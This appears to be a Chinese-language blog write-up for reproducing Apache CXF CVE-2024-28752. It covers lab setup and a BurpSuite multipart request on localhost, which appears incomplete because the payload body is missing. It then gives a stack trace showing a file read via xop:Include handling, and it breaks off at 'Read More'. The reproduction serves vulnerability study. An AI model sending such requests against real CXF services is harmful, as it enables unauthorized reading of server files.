Apache CXF CVE-2024-28752 复现环境 漏洞公告：https://cxf.apache.org/security-advisories.data/CVE-2024-28752.txt 环境启动 samples/java_first_jaxws_factory_bean IDEA 通过 ServerStarter.java 启动 webservice 服务 构建 使用 JDK8 “`bash mvn clean package java -jar target/cxf.jar “` 漏洞利用 使用 BurpSuite 发送如下请求即可触发。 “`http request POST /test HTTP/1.1 Host: 127.0.0.1:8080 Content-Type: multipart/related; boundary=—-kkkkkk123123213 Content-Length: 472 Connection: close ——kkkkkk123123213 Content-Disposition: form-data; name="1" ——kkkkkk123123213– “` 漏洞分析 以下是文件读取的堆栈，xop:Include 标签是由 MTOMDecorator 这个类来解析的。 text <init>:93, FileInputStream (java.io) connect:90, FileURLConnection (sun.net.www.protocol.file) getInputStream:188, FileURLConnection (sun.net.www.protocol.file) openStream:1092, URL (java.net) getInputStream:107, URLDataSource (javax.activation) get:181, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller) length:212, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller) _parseInt:94, DatatypeConverterImpl (com.sun.xml.internal.bind) parse:725, RuntimeBuiltinLeafInfoImpl$18 (com.sun.xml.internal.bind.v2.model.impl) parse:723, RuntimeBuiltinLeafInfoImpl$18 (com.sun.xml.internal.bind.v2.model.impl) text:54, TextLoader (com.sun.xml.internal.bind.v2.runtime.unmarshaller) text:572, UnmarshallingContext (com.sun.xml.internal.bind.v2.runtime.unmarshaller) startElement:92, MTOMDecorator…Read More